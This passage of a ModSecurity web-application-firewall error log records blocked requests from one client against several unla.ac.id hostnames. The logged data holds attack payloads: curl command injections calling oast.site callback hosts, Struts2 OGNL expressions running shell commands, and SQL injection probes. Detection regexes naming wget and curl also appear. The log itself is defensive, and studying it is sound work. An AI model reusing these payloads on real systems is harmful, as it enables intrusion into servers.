Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccess [hostname "journal.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LsCo-f0AAARy-0sAAAAb"]
[Tue Aug 29 11:33:50.388891 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:task_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:task_number: 1;curl http:/cjmn8l5jmimk2adbbnlgtkaxp8hx17ywx.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/en/php/usb_sync.php"] [unique_id "ZO11LsCo-f0AAARdiMsAAAAK"]
[Tue Aug 29 11:33:50.412634 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgmtnqwgjph6dhf.oast.site -H 'User-Agent: CRvF1U'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11LsCo-f0AAARtACYAAAAV"]
[Tue Aug 29 11:33:51.318621 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "informatika.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11L8Co-f0AAASEJQoAAAAE"]
[Tue Aug 29 11:33:51.326304 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "unla.ac.id"] [uri "/index.action"] [unique_id "ZO11L8Co-f0AAAQKOp0AAAAs"]
[Tue Aug 29 11:33:51.329256 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "ft.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11L8Co-f0AAARjjSwAAAAL"]
[Tue Aug 29 11:33:51.335037 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "journal.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11L8Co-f0AAASFeeQAAAAG"]
[Tue Aug 29 11:33:51.337493 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "pusatbahasa.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11L8Co-f0AAANsAmcAAAAD"]
[Tue Aug 29 11:33:51.359029 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:uid: 10; curl http:/cjmn8l5jmimk2adbbnlg9mgrf79w4bkcs.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/system/sharedir.php"] [unique_id "ZO11L8Co-f0AAARdiM8AAAAK"]
[Tue Aug 29 11:33:52.373651 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:customer_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:customer_number: -1' UNION ALL SELECT NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/mims/updatecustomer.php"] [unique_id "ZO11MMCo-f0AAAR@KJIAAAAF"]
[Tue Aug 29 11:33:52.401048 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sondata[ip]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:sondata[ip]: a|curl cjmn8l5jmimk2adbbnlg1b8r9h4jmc1nu.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/php/ping.php"] [unique_id "ZO11MMCo-f0AAARdiNIAAAAK"]
[Tue Aug 29 11:33:52.426547 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:customer_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:customer_number: -1' UNION ALL SELECT NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/mims/updatecustomer.php"] [unique_id "ZO11MMCo-f0AAARdiNMAAAAK"]
[Tue Aug 29 11:33:52.427874 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "journal.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11MMCo-f0AAARtACwAAAAV"]
[Tue Aug 29 11:33:52.452853 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:customer_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:customer_number: -1' UNION ALL SELECT NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/mims/updatecustomer.php"] [unique_id "ZO11MMCo-f0AAARtAC0AAAAV"]
[Tue Aug 29 11:33:52.471476 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "pusatbahasa.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11MMCo-f0AAASEJRIAAAAE"]
[Tue Aug 29 11:33:52.472604 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:customer_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:customer_number: -1' UNION ALL SELECT NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/mims/updatecustomer.php"] [unique_id "ZO11MMCo-f0AAAR@KJYAAAAF"]
[Tue Aug 29 11:33:52.493741 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "unla.ac.id"] [uri "/login.action"] [unique_id "ZO11MMCo-f0AAARQ4DoAAAAB"]
[Tue Aug 29 11:33:52.550382 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "ft.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11MMCo-f0AAARtADEAAAAV"]
[Tue Aug 29 11:33:52.551288 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:customer_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:customer_number: -1' UNION ALL SELECT NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/mims/updatecustomer.php"] [unique_id "ZO11MMCo-f0AAASEJRYAAAAE"]
[Tue Aug 29 11:33:52.552288 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:task_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:task_number: 1;curl http:/cjmn8l5jmimk2adbbnlgxrpxhsi75sdpy.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/en/php/usb_sync.php"] [unique_id "ZO11MMCo-f0AAAR@KJoAAAAF"]
[Tue Aug 29 11:33:52.571740 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "informatika.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11MMCo-f0AAARtADIAAAAV"]
[Tue Aug 29 11:33:53.301056 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sondata[ip]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:sondata[ip]: a|curl cjmn8l5jmimk2adbbnlgef7f1bqjhh9xw.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/php/ping.php"] [unique_id "ZO11McCo-f0AAASFeegAAAAG"]
[Tue Aug 29 11:33:53.303728 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sondata[ip]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:sondata[ip]: a|curl cjmn8l5jmimk2adbbnlgaref78cqfgjmb.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/php/ping.php"] [unique_id "ZO11McCo-f0AAARy-1EAAAAb"]
[Tue Aug 29 11:33:53.308370 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sondata[ip]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:sondata[ip]: a|curl cjmn8l5jmimk2adbbnlgkujkf3z53hstm.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/php/ping.php"] [unique_id "ZO11McCo-f0AAASAHeYAAAAH"]
[Tue Aug 29 11:33:53.319805 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sondata[ip]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:sondata[ip]: a|curl cjmn8l5jmimk2adbbnlgxbbjtg9fg7i3t.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/php/ping.php"] [unique_id "ZO11McCo-f0AAANsAmoAAAAD"]
